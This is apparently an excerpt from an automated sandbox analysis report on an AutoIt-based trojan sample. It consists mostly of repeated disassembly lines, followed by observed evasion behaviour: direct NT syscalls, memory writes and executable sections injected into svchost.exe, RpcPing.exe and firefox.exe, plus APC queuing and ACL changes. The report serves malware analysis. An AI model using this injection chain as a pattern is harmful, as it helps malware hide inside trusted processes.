Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C86ACC mov eax, dword ptr fs:[00000030h] 2_2_03C86ACC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C86ACC mov eax, dword ptr fs:[00000030h] 2_2_03C86ACC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C30AD0 mov eax, dword ptr fs:[00000030h] 2_2_03C30AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C64AD0 mov eax, dword ptr fs:[00000030h] 2_2_03C64AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C64AD0 mov eax, dword ptr fs:[00000030h] 2_2_03C64AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6AAEE mov eax, dword ptr fs:[00000030h] 2_2_03C6AAEE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6AAEE mov eax, dword ptr fs:[00000030h] 2_2_03C6AAEE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h] 2_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h] 2_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h] 2_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h] 2_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h] 2_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h] 2_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h] 2_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h] 2_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h] 2_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D04A80 mov eax, dword ptr fs:[00000030h] 2_2_03D04A80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C68A90 mov edx, dword ptr fs:[00000030h] 2_2_03C68A90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C38AA0 mov eax, dword ptr fs:[00000030h] 2_2_03C38AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C38AA0 mov eax, dword ptr fs:[00000030h] 2_2_03C38AA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C86AA4 mov eax, dword ptr fs:[00000030h] 2_2_03C86AA4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h] 2_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h] 2_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h] 2_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h] 2_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h] 2_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h] 2_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h] 2_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C40A5B mov eax, dword ptr fs:[00000030h] 2_2_03C40A5B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C40A5B mov eax, dword ptr fs:[00000030h] 2_2_03C40A5B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6CA6F mov eax, dword ptr fs:[00000030h] 2_2_03C6CA6F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6CA6F mov eax, dword ptr fs:[00000030h] 2_2_03C6CA6F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6CA6F mov eax, dword ptr fs:[00000030h] 2_2_03C6CA6F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CDEA60 mov eax, dword ptr fs:[00000030h] 2_2_03CDEA60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CACA72 mov eax, dword ptr fs:[00000030h] 2_2_03CACA72
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CACA72 mov eax, dword ptr fs:[00000030h] 2_2_03CACA72
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CBCA11 mov eax, dword ptr fs:[00000030h] 2_2_03CBCA11
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6CA24 mov eax, dword ptr fs:[00000030h] 2_2_03C6CA24
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C5EA2E mov eax, dword ptr fs:[00000030h] 2_2_03C5EA2E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C54A35 mov eax, dword ptr fs:[00000030h] 2_2_03C54A35
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C54A35 mov eax, dword ptr fs:[00000030h] 2_2_03C54A35
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6CA38 mov eax, dword ptr fs:[00000030h] 2_2_03C6CA38
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CC69C0 mov eax, dword ptr fs:[00000030h] 2_2_03CC69C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h] 2_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h] 2_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h] 2_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h] 2_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h] 2_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h] 2_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C649D0 mov eax, dword ptr fs:[00000030h] 2_2_03C649D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CFA9D3 mov eax, dword ptr fs:[00000030h] 2_2_03CFA9D3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CBE9E0 mov eax, dword ptr fs:[00000030h] 2_2_03CBE9E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C629F9 mov eax, dword ptr fs:[00000030h] 2_2_03C629F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C629F9 mov eax, dword ptr fs:[00000030h] 2_2_03C629F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h] 2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h] 2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h] 2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h] 2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h] 2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h] 2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h] 2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h] 2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h] 2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h] 2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h] 2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h] 2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h] 2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C309AD mov eax, dword ptr fs:[00000030h] 2_2_03C309AD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C309AD mov eax, dword ptr fs:[00000030h] 2_2_03C309AD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB89B3 mov esi, dword ptr fs:[00000030h] 2_2_03CB89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB89B3 mov eax, dword ptr fs:[00000030h] 2_2_03CB89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB89B3 mov eax, dword ptr fs:[00000030h] 2_2_03CB89B3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB0946 mov eax, dword ptr fs:[00000030h] 2_2_03CB0946
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D04940 mov eax, dword ptr fs:[00000030h] 2_2_03D04940
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C56962 mov eax, dword ptr fs:[00000030h] 2_2_03C56962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C56962 mov eax, dword ptr fs:[00000030h] 2_2_03C56962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C56962 mov eax, dword ptr fs:[00000030h] 2_2_03C56962
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C7096E mov eax, dword ptr fs:[00000030h] 2_2_03C7096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C7096E mov edx, dword ptr fs:[00000030h] 2_2_03C7096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C7096E mov eax, dword ptr fs:[00000030h] 2_2_03C7096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CD4978 mov eax, dword ptr fs:[00000030h] 2_2_03CD4978
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CD4978 mov eax, dword ptr fs:[00000030h] 2_2_03CD4978
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CBC97C mov eax, dword ptr fs:[00000030h] 2_2_03CBC97C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CAE908 mov eax, dword ptr fs:[00000030h] 2_2_03CAE908
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CAE908 mov eax, dword ptr fs:[00000030h] 2_2_03CAE908
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CBC912 mov eax, dword ptr fs:[00000030h] 2_2_03CBC912
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C28918 mov eax, dword ptr fs:[00000030h] 2_2_03C28918
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C28918 mov eax, dword ptr fs:[00000030h] 2_2_03C28918
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CB892A mov eax, dword ptr fs:[00000030h] 2_2_03CB892A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CC892B mov eax, dword ptr fs:[00000030h] 2_2_03CC892B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C5E8C0 mov eax, dword ptr fs:[00000030h] 2_2_03C5E8C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03D008C0 mov eax, dword ptr fs:[00000030h] 2_2_03D008C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CFA8E4 mov eax, dword ptr fs:[00000030h] 2_2_03CFA8E4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6C8F9 mov eax, dword ptr fs:[00000030h] 2_2_03C6C8F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C6C8F9 mov eax, dword ptr fs:[00000030h] 2_2_03C6C8F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C30887 mov eax, dword ptr fs:[00000030h] 2_2_03C30887
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CBC89D mov eax, dword ptr fs:[00000030h] 2_2_03CBC89D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C42840 mov ecx, dword ptr fs:[00000030h] 2_2_03C42840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C60854 mov eax, dword ptr fs:[00000030h] 2_2_03C60854
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C34859 mov eax, dword ptr fs:[00000030h] 2_2_03C34859
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03C34859 mov eax, dword ptr fs:[00000030h] 2_2_03C34859
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CBE872 mov eax, dword ptr fs:[00000030h] 2_2_03CBE872
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03CBE872 mov eax, dword ptr fs:[00000030h] 2_2_03CBE872
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007A81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_007A81F7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_0077A364 SetUnhandledExceptionFilter, 0_2_0077A364
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_0077A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0077A395

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe NtResumeThread: Direct from: 0x773836AC Jump to behavior
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe NtMapViewOfSection: Direct from: 0x77382D1C Jump to behavior
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe NtWriteVirtualMemory: Direct from: 0x77382E3C Jump to behavior
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe NtProtectVirtualMemory: Direct from: 0x77382F9C Jump to behavior
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe NtSetInformationThread: Direct from: 0x773763F9 Jump to behavior
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe NtCreateMutant: Direct from: 0x773835CC Jump to behavior
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe NtNotifyChangeKey: Direct from: 0x77383C2C Jump to behavior
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe NtSetInformationProcess: Direct from: 0x77382C5C Jump to behavior
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe NtCreateUserProcess: Direct from: 0x7738371C Jump to behavior
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe NtQueryInformationProcess: Direct from: 0x77382C26 Jump to behavior
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe NtResumeThread: Direct from: 0x77382FBC Jump to behavior
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe NtWriteVirtualMemory: Direct from: 0x7738490C Jump to behavior
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe NtAllocateVirtualMemory: Direct from: 0x77383C9C Jump to behavior
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe NtReadFile: Direct from: 0x77382ADC Jump to behavior
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe NtAllocateVirtualMemory: Direct from: 0x77382BFC Jump to behavior
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe NtDelayExecution: Direct from: 0x77382DDC Jump to behavior
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe NtQuerySystemInformation: Direct from: 0x77382DFC Jump to behavior
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe NtOpenSection: Direct from: 0x77382E0C Jump to behavior
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe NtQueryVolumeInformationFile: Direct from: 0x77382F2C Jump to behavior
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe NtQuerySystemInformation: Direct from: 0x773848CC Jump to behavior
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe NtReadVirtualMemory: Direct from: 0x77382E8C Jump to behavior
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe NtCreateKey: Direct from: 0x77382C6C Jump to behavior
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe NtAllocateVirtualMemory: Direct from: 0x773848EC Jump to behavior
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe NtQueryAttributesFile: Direct from: 0x77382E6C Jump to behavior
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe NtSetInformationThread: Direct from: 0x77382B4C Jump to behavior
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe NtTerminateThread: Direct from: 0x77382FCC Jump to behavior
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe NtQueryInformationToken: Direct from: 0x77382CAC Jump to behavior
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe NtOpenKeyEx: Direct from: 0x77382B9C Jump to behavior
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe NtAllocateVirtualMemory: Direct from: 0x77382BEC Jump to behavior
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe NtDeviceIoControlFile: Direct from: 0x77382AEC Jump to behavior
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe NtCreateFile: Direct from: 0x77382FEC Jump to behavior
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe NtOpenFile: Direct from: 0x77382DCC Jump to behavior
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe NtClose: Direct from: 0x77377B2E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\RpcPing.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: NULL target: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: NULL target: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Thread register set: target process: 6244 Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Thread APC queued: target process: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 315D008 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007A8C93 LogonUserW, 0_2_007A8C93
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_00753B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00753B4C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_00754A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00754A35
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007B4EF5 mouse_event, 0_2_007B4EF5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe" Jump to behavior
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe Process created: C:\Windows\SysWOW64\RpcPing.exe "C:\Windows\SysWOW64\RpcPing.exe" Jump to behavior
Source: C:\Windows\SysWOW64\RpcPing.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007A81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_007A81F7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_007B4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_007B4C03
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: DUipWAeQLm.exe, 00000008.00000002.3339017603.0000000000D31000.00000002.00000001.00040000.00000000.sdmp, DUipWAeQLm.exe, 00000008.00000000.2590373211.0000000000D31000.00000002.00000001.00040000.00000000.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3339488424.0000000001431000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: IProgram Manager
Source: SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe, DUipWAeQLm.exe, 00000008.00000002.3339017603.0000000000D31000.00000002.00000001.00040000.00000000.sdmp, DUipWAeQLm.exe, 00000008.00000000.2590373211.0000000000D31000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: DUipWAeQLm.exe, 00000008.00000002.3339017603.0000000000D31000.00000002.00000001.00040000.00000000.sdmp, DUipWAeQLm.exe, 00000008.00000000.2590373211.0000000000D31000.00000002.00000001.00040000.00000000.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3339488424.0000000001431000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: DUipWAeQLm.exe, 00000008.00000002.3339017603.0000000000D31000.00000002.00000001.00040000.00000000.sdmp, DUipWAeQLm.exe, 00000008.00000000.2590373211.0000000000D31000.00000002.00000001.00040000.00000000.sdmp, DUipWAeQLm.exe, 0000000A.00000002.3339488424.0000000001431000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe Code function: 0_2_0077886B cpuid 0_2_0077886B
